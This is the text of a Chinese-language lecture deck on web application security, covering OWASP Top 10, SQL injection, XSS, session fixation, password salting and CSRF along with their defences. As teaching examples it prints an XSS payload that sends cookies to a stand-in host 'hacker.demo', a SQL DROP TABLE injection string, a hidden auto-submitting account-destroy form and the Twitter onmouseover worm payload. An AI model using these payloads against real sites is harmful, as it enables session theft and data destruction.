Downloaded 148 times
![改寫畫面
98
http://xss.demo/welcome?name=<script>document.getElementsByTagName("html")[
<script>document.getElementsByTagName("html")[0].innerHTML="Name: <input
type='text'/><br>Password: <input type='password'>";</script>](https://image.slidesharecdn.com/security-2019-190315062739/85/2019-98-320.jpg)
![其他(資源)
• Understanding the OWASP Top 10
Vulnerabilities
• The OWASP Top Ten and ESAPI
• Cookie & Session & CSRF
• [Nodejs] Security: Broken
Authentication
• Ruby on Rails Security Guide
• 駭客手法解析~你不能不知的資安問題!!
100](https://image.slidesharecdn.com/security-2019-190315062739/85/2019-100-320.jpg)
Uploaded byJustin Lin
網站系統安全及資料保護設計認知 2019
本文件讨论了网站系统安全和数据保护的设计意识,包括数据保护的重要性、OWASP前10大漏洞、SQL注入、跨站脚本(XSS)、会话管理和安全性等话题。此外,还概述了常见的网络攻击方式、相应的防范措施及密码管理的重要性,强调了安全教育和专属工具的必要性。文档提供了关于如何增强网络安全的各种策略和措施以及相关的法律和经济影响。
More Related Content
網站系統安全及資料保護設計認知 2019
- 1.
- 2. 接下來… • 網站系統安全及資料保護設計認知(一) – 資料(訊)保護重要性 –認識 OWASP TOP 10 – SQL 注入(SQL Injection) – 跨網站指令碼(XSS) – Session 管理與安全 2
- 3. • 網站系統安全及資料保護設計認知(二) – 密碼管理 –跨網站冒名請求(CSRF) – 再看 XSS – 更多資源 3
- 4.
- 5.
- 6.
- 7.
- 8. • 重大負面影響 – 政策 –商譽 – … www.ithome.com.tw/tech/90726 8
- 9.
- 10. 被忽略的安全 • 軟體品質 • 軟體開發 •專責部門 • 專責人員 • 專門工具 • 安全教育 10
- 11. • 通用漏洞披露 • 始於1999 • 收集特定軟體漏洞並編號 CVE-YYYY- NNNN – OpenSSL 'Heartbleed' vulnerability (CVE- 2014-0160) – CPU 推測執行(speculative execution)漏洞 衍生的變種(CVE-2017-5753、CVE-2017-5715、 CVE-2017-5754) 11 cve.mitre.org CVE 資料庫
- 12. • 通用軟體弱點 • 始於2005 • What is the difference between a software vulnerability and software weakness? 12 cwe.mitre.org Software weaknesses are errors that can lead to software vulnerabilities. CWE 資料庫
- 13. OWASP • 始於 2001 •研議協助解決網路軟體安全之標準、工具 與技術文件 • OWASP TOP 10 為其中計畫之一 13 www.owasp.org
- 14. OWASP TOP 10 •2002 年發起,針對 Web 應用程式最重大、 嚴重的十大弱點進行排名 • 首次 OWASP Top 10 於 2003 發布 • 2004 做了更新,之後每三年改版一次 • 最新正式版本為 OWASP Top 10 2017 14 www.owasp.org/index.php/Category:OWASP_Top_Ten_Project
- 15.
- 16. OWASP ESAPI • OWASPEnterprise Security API 16 www.owasp.org/index.php/Category:OWASP_Enterprise_Security_API
- 17. • Injection 攻擊 –SQL Injection – XML Injection – LDAP Injection – Code Injection 17
- 18.
- 19.
- 20.
- 21. 21 Robert'); DROP TABLESTUDENTS; -- Derper
- 22. SQL Injection 危害 •迴避認證 • 竊取資料 • 改寫資料庫內容 • 讀寫伺服器上的檔案、執行程式 • … 22
- 23.
- 24. SQL Injection 防範 •避免串接字串方式建立 SQL 24 Java Python
- 25.
- 26. • Escape 特殊字元 –(ESAPI.encoder().encodeForSQL()) • 輸入驗證(伺服端) – 黑名單(Black List) – 白名單(White List) 26 SQL Injection 防範
- 27.
- 28. • 變化形式 – ReflectedXSS(First-order XSS) – Stored/Persistent XSS(Second-order XSS) – DOM-based/Local XSS • 危害 – 會話劫奪(Session hijacking) – 釣魚(Phishing) – XSS 蠕蟲 – … 28 2010 Twitter
- 29. Session hijacking • 某網站搜尋功能回送查詢字串 29 Couldnot find any documents including "foo" Search foo http://xss.demo/search?keyword=foo
- 30. 30 <b>foo</b>Search http://xss.demo/search?keyword=<b>foo</b> Could not findany documents including "<b>foo</b>" http://xss.demo/search?keyword=<b>foo</b>
- 31. 31 <script language='javascript'>document.write(document.cookie)</script> Search Could not findany documents including "<script language='javascript'>document.write(document.cookie)</script>" http://xss.demo/search?keyword=Could not find any documents including "<script … SESSION ID
- 32. 32 <script language='javascript'>document.write('<img src="http://hacker.demo/collect?sid=' +document.cookie + '">');</script> http://xss.demo/search?keyword= <script language='javascript'> document.write('<img src="http://hacker.demo/collect?sid=' + document.cookie + '">'); </script>
- 33. 33 http://xss.demo/search?keyword=<script language='javascript'>document.write('<img src="http://hacker.demo/collect?sid=' + document.cookie +'">');</script> http://xss.demo/search?keyword=%3Cscript%20langua ge%3D'javascript'%3Edocument.write('%3Cimg%20src %3D%22http%3A%2F%2Fhacker.demo%2Fcollect%3Fsi d%3D'%20%2B%20document.cookie%20%2B%20'%22 %3E')%3B%3C%2Fscript%3E URL Encoding
- 34.
- 35.
- 36. Reflected XSS 36 xss.demo hacker.demo 美女走光圖^o^ http://site.demo/share 1. 按下鏈結 2.查詢 3. 傳回結果 4. 傳送 session id
- 37.
- 38. XSS 基本防範 • 強化輸入驗證 –黑名單 – 白名單 – (ESAPI.validator()) – (OWASP Java HTML Sanitizer) • 對輸出進行編碼 – (ESAPI.encoder().encodeForURL()) – (OWASP Java Encoder Project) 38
- 39. Session ID? • 被拿走了又如何? •HTTP 會話基本原理 – 每個請求對伺服器來說都是新的訪客請求 – 每次請求時主動告知伺服器必要的資訊 39
- 40.
- 41.
- 42.
- 43.
- 44. • 設定 Cookie •取得 Cookie 44
- 45.
- 46.
- 47.
- 48.
- 49.
- 50.
- 51.
- 52. Session Fixation 攻擊 •誘使受害者使用特定的 Session ID – Session ID 透過 URL 參數指定時容易被利用 52
- 53. 53 sidfix.demo 1. 取得 sid2.放入鏈結 <a href="http://sidfix.demo/login;sid=8 51BB160B811634B03EDD08B60BFD 98D">美女走光圖</a> 美女走光圖^o^ 3. 點選鏈結 4. 喔?需要登入?沒問題! 5. Got it! Session Fixation
- 54. Session 防範對策 • 不從GET、POST 參數取得 Session Id? – Cookie 是可以偽照的 • 使用 HTTPS • 不將 Session ID 用於 URL – Referer 可能洩漏 Session ID • 不採用 Session ID 預設名稱 54
- 55. Session 防範對策 • 設定Session 之逾時 • 登入後重新產生 Session ID • 重要操作前進行二次驗證 • 正確設定 Cookie 的 Domain、Secure、 HttpOnly • (啟用伺服端軟體的 Session Fixation 自 動化保護機制) 55
- 56. Session 錯亂? • 來自數個真實的案例 56 //這是一個 Servlet 內部 private String name; private String passwd; @Override protected void doPost( HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException { name = request.getParameter("name"); passwd = request.getParameter("passwd"); if(login(name, passwd)) { List data = query(name); ... } }
- 57.
- 58.
- 59.
- 60.
- 61.
- 62.
- 63.
- 64.
- 65.
- 66.
- 67. Secured Salted • 在密碼雜湊時加入鹽值(亂數) –UUID 或其他夠長且唯一的亂數 – 每個使用者產生不同的鹽值 • 分別儲存鹽值與雜湊值 • (驗證時取得使用者輸入之密碼與儲存之 鹽值進行雜湊,然後與儲存之雜湊值比對) 67
- 68.
- 69.
- 70.
- 71. 慢得剛好 • 現代的運算設備速度越來越快 • 讓破解過程變慢是防禦的一種策略 •BCrypt、PBKDF2、SCRYPT • 不是祕密的祕密 71
- 72.
- 73.
- 74. 密碼強度 74 • 傻瓜密碼 Out •規則越少越好 • 字元與數字夾雜 • 長度越長越好
- 75.
- 76.
- 77.
- 78.
- 79.
- 80.
- 81. 跨網站冒名請求(CSRF) • Cross-site RequestForgery • 使用者通過驗證且 Session 未過期 • 授權、存取控制設計不良 • 在使用者不知情下進行特定行為 – 修改密碼、轉帳、自動發文、加好友… 81 1. 登入網站 2. 刪除專案 http://webapp.com/project/1/destroy
- 82.
- 83. GET 的錯? • GET應用於等冪(Idempotent)操作 – 多次 GET 的結果應相同 – 不改變執行結果,通常不會改變伺服器狀態 • 使用 GET 確實降低了 CSRF 的難度 • 不過也可以透過 POST 來發動類似的請求 83
- 84. 84 <a href="http://www.harmless.com/" onclick=" varf = document.createElement('form'); f.style.display = 'none'; this.parentNode.appendChild(f); f.method = 'POST'; f.action = 'http://webapp.com/account/destroy'; f.submit(); return false;">好康在這裡</a> <img src="http://www.harmless.com/img" width="400" height="400" onmouseover="..." /> 滑鼠略過圖也可以 … 利用一些 JavaScript 寫些 Ajax 請求,都有可能…
- 85. CSRF 防範 • 重新認識HTTP 請求方法 – https://openhome.cc/Gossip/Programmer/ HttpMethod.html • 使用 Request Token – 不少 Web 框架有內建 – OWASP CSRFGuard • 不依賴 Session Id 作為身份驗證 • 重要行為前要求重新認證與授權 85
- 86.
- 87.
- 88. CSRF 防範 • 重新認識HTTP 請求方法 – openhome.cc/Gossip/Programmer/HttpMe thod.html • 使用 Request Token – 不少 Web 框架有內建 – OWASP CSRFGuard • 不依賴 Session Id 作為身份驗證 • 重要行為前要求重新認證與授權 • (OAuth 2?) 88
- 89. 再看 XSS • ReflectedXSS • Stored/Persistent XSS • DOM-based/Local XSS 89
- 90. Samy • 2005 年Samy 跟女友打賭他在 MySpace 上有很多粉絲,將他設成英雄(Hero)。 • Samy 寫了一隻 Stored/XSS 蠕蟲,因為散 播太快而導致 MySpace 當機 • Samy 當時被美國秘密警察逮捕,判三年緩 刑與 90 天的社區服務。 90
- 91.
- 92.
- 93. • 推文 • HTML 93 http://www.guardian.co.uk/technologyis the best! <a href="http://www.guardian.co.uk/technology" class="tweet-url web" rel="nofollow">http://www.guardian.co.uk/technology</a> is the best!
- 94. • 推文 • <a>變成 94 <a href="http://a.no/@";onmouseover=";$('textarea:first').val (this.innerHTML);$('.status-update- form').submit();"class="modal-overlay"/ class="tweet-url web" rel="nofollow"> http://a.no/@";onmouseover=";$('textarea:first').val(this. innerHTML);$('.status-update- form').submit();"class="modal-overlay"/
- 95. DOM-based XSS • 直接利用客戶端JavaScript • (伺服端未參與其中的流程) 95 <html> <title>Welcome!</title>Hi <script> var pos = document.URL.indexOf("name=") + 5; document.write( document.URL.substring(pos,document.URL.length) ); </script> <br>Welcome to our system… </html>
- 96.
- 97.
- 98.
- 99.
- 100. 其他(資源) • Understanding theOWASP Top 10 Vulnerabilities • The OWASP Top Ten and ESAPI • Cookie & Session & CSRF • [Nodejs] Security: Broken Authentication • Ruby on Rails Security Guide • 駭客手法解析~你不能不知的資安問題!! 100
- 101.
- 102.
- 103. 在漏洞發生之前… • 軟體品質 • 開發流程 •專責部門 • 專責人員 • 專門工具 • 安全教育 103
- 104.